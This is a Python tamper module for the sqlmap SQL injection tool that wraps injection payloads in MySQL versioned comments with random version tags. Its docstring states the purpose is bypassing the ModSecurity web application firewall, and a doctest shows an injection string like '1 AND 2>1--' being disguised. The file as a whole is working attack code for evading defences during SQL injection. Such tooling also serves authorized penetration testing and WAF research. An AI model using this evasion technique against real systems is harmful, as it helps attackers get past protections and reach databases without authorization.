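#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os

from lib.core.common import randomInt
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHER

# Trailing-comment markers (sqlmap's usual payload suffixes). Whatever follows
# the first of these in the payload must be left OUTSIDE the versioned comment,
# otherwise the closing "*/" ends up commented out or the comment is cut short.
COMMENT_MARKERS = ('#', '--', '/*')

def dependencies():
    """Emit a one-time warning that this tamper script only makes sense against MySQL."""
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def _splitTrailingComment(payload):
    """
    Split *payload* into (sql, trailing_comment) at the EARLIEST comment marker.

    The split is by position, not by marker precedence: a payload that carries
    more than one marker (e.g. "... /* ... -- ") is cut where the first one
    appears, so no marker text is ever pulled inside the versioned comment.
    Markers are matched textually; one that sits inside a string literal is
    still treated as a comment start (same limitation as before).

    Returns the untouched payload and an empty postfix when no marker is found.
    """
    positions = [payload.find(marker) for marker in COMMENT_MARKERS if marker in payload]
    if not positions:
        return payload, ''
    cut = min(positions)
    return payload[:cut], payload[cut:]

def tamper(payload, **kwargs):
    """
    Embraces complete query with (MySQL) versioned comment

    Requirement:
        * MySQL

    Tested against:
        * MySQL 5.0

    Notes:
        * Useful to bypass ModSecurity WAF
        * The first whitespace-separated token (typically the injected value)
          is left bare; everything up to the trailing comment marker is wrapped
          in "/*!30NNN ... */", which MySQL executes but a generic SQL parser
          treats as a comment. A payload without a space is returned unchanged.
        * The trailing comment is detected at the earliest '#', '--' or '/*'
          in the payload. NOTE(review): a preceding tamper that injects "/* */"
          into the SQL (e.g. randomcomments) therefore ends the wrapped span at
          that inserted comment -- chain with care.

    >>> import random
    >>> random.seed(0)
    >>> tamper('1 AND 2>1--')
    '1 /*!30963AND 2>1*/--'
    """

    retVal = payload

    if payload:
        query, postfix = _splitTrailingComment(payload)

        if ' ' in query:
            # head: first token stays outside; tail: the remainder of the SQL
            # (comment marker and anything after it are already in `postfix`)
            head, _, tail = query.partition(' ')
            # "30" + three random digits yields a version tag such as /*!30963
            # (MySQL 3.x) -- low enough that every MySQL server executes the
            # comment body, random enough to defeat a fixed-string signature
            retVal = "%s /*!30%s%s*/%s" % (head, randomInt(3), tail, postfix)

    return retVal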